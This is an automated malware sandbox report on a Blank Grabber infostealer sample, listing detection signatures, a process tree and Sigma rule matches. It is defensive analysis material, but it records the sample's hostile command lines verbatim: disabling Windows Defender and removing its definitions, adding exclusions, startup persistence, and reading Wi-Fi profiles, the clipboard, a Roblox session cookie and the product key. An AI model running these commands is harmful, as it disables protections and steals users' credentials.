
Windows Analysis Report
9g9LZNE4bH.exe

Overview

General Information

Sample name: 9g9LZNE4bH.exe
renamed because original name is a hash value
Original sample name: fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
Analysis ID: 1584119
MD5: 03bb5937fb7b74837da488b2278d0811
SHA1: 51259fa1bf7608d3c394c2f7776f581d5251aa01
SHA256: fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29
Tags: exe, user-zhuzhu0009

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 9g9LZNE4bH.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\9g9LZNE4bH.exe" MD5: 03BB5937FB7B74837DA488B2278D0811)
    • 9g9LZNE4bH.exe (PID: 5860 cmdline: "C:\Users\user\Desktop\9g9LZNE4bH.exe" MD5: 03BB5937FB7B74837DA488B2278D0811)
      • cmd.exe (PID: 1868 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5024 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5988 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5440 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7868 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 3712 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 3840 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7224 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7428 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7240 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7388 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7488 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7860 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7764 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7512 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7784 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7772 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7880 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8076 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 1576 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5704 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted] MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 7632 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7292 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF89E.tmp" "c:\Users\user\AppData\Local\Temp\3lfchnc2\CSC30375EB9C2504D3B856F38EEC7AAE920.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 412 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7924 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7760 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 7956 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7668 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7664 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7492 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7648 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 1272 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2820 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8116 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7444 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7312 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7360 cmdline: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7716 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7892 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5424 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4296 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4180 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6520 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6392 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3780 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7824 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI61762\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", ProcessId: 1868, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5988, ProcessName: cmd.exe
Source: Process started; Author: @ROxPinTeddy; Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", ProcessId: 7312, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
              Source: Process started Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ...
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7512, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\9g9LZNE4bH.exe", ParentImage: C:\Users\user\Desktop\9g9LZNE4bH.exe, ParentProcessId: 5860, ParentProcessName: 9g9LZNE4bH.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'", ProcessId: 1868, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process started Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ...
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\9g9LZNE4bH.exe, ProcessId: 5860, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5704, TargetFilename: C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7312, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\BPWmX.zip" *, ProcessId: 7360, ProcessName: rar.exe
